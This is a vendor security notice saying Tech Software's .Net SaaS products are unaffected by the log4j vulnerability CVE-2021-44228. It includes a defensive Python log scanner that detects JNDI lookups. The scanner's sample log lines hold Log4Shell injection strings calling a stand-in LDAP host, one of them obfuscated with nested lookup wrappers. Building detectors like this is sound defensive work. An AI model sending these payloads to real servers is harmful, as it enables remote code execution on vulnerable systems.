What is this document?
This document describes the impact (or lack thereof) of CVE-2021-44228 on Tech Software's OneAegis (f/k/a IRBManager), SMART, and Study Binders SaaS solutions.
What's the problem?
NVD - CVE-2021-44228 (nist.gov) describes a critical vulnerability in the widely used log4j (i.e. "Log for Java") logging framework, announced 10 Dec 2021, with a base severity score of 10 (out of 10!).
In short -- Our solutions are not impacted by this vulnerability.
Tech Software uses the Microsoft .Net programming stack for our development efforts. As such, while we do use logging frameworks, we do not use log4j, nor does the .Net stack support JNDI, the underlying technology that makes this vulnerability exploitable.
One of our back-end infrastructure tools, the Sumo Logic log collector, which we use for log aggregation and security event monitoring, did use an impacted version of log4j; however, in our use case this would not have resulted in a problem. Additionally, we have patched all servers to an updated version of the collector that is not impacted.
We continue to monitor our log files for any indicators of compromise and are confident we are not adversely affected by this vulnerability.
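The monitoring described above is, in practice, a scan of collected logs for the JNDI lookup string that CVE-2021-44228 relies on. The following is an added example of such a check and is not code from Tech Software or from Sumo Logic; the log lines, the host `example.invalid` and the function names are constructed for illustration. It normalises the simple lookup wrappers (`${lower:x}`, `${upper:x}`, `${::-x}`) that log4j would itself resolve, so that a lookup split across nested wrappers is still seen as the same indicator.

```python
import re

# Constructed sample log lines (not real traffic). They mimic an application log
# in which a request header (here the User-Agent) is echoed into the log message,
# which is exactly the path by which CVE-2021-44228 is triggered on a vulnerable host.
SAMPLE_LOG_LINES = [
    '2021-12-11T03:14:07Z GET /login 200 ua="Mozilla/5.0 (Windows NT 10.0)"',
    '2021-12-11T03:14:09Z GET / 200 ua="${jndi:ldap://example.invalid/a}"',
    '2021-12-11T03:14:12Z GET /api 404 ua="${${lower:j}ndi:${lower:l}dap://example.invalid/b}"',
    '2021-12-11T03:14:15Z GET /health 200 ua="curl/7.79.1"',
]

# log4j lookup wrappers that resolve to a single literal: ${lower:x}, ${upper:x}, ${::-x}.
# Group 1 captures the lower/upper form, group 2 the default-value form.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{:*-([^${}]*)\}", re.IGNORECASE)

# The indicator itself: a JNDI lookup, matched case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookup wrappers until the text stops changing.

    max_rounds bounds the work so a pathological line cannot spin the scanner.
    """
    for _ in range(max_rounds):
        new = _WRAPPER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def is_suspicious(line: str) -> bool:
    """True if the line carries a JNDI lookup after wrapper normalisation."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every line carrying the indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        if JNDI_LOOKUP.search(norm):
            hits.append((number, norm))
    return hits


if __name__ == "__main__":
    for number, norm in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {norm}")
```

In a real deployment the scan would run over the aggregated log stream rather than an in-memory list, and a hit on a .Net-only estate is evidence of scanning activity against the service rather than of compromise; it is still worth recording, because the same sources may later target a component that does run log4j.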
| Resource | Link |
| --- | --- |
| Overview of issue | NVD - CVE-2021-44228 (nist.gov) |
| Cybersecurity & Infrastructure Security Agency (CISA) list of impacted software | cisagov/log4j-affected-db (github.com) |
| CISA guidance | Apache Log4j Vulnerability Guidance \| CISA |
| GitHub pull request to add Tech Software to the CISA product list | Add Tech Software products by WaldenL · Pull Request #124 · cisagov/log4j-affected-db (github.com) |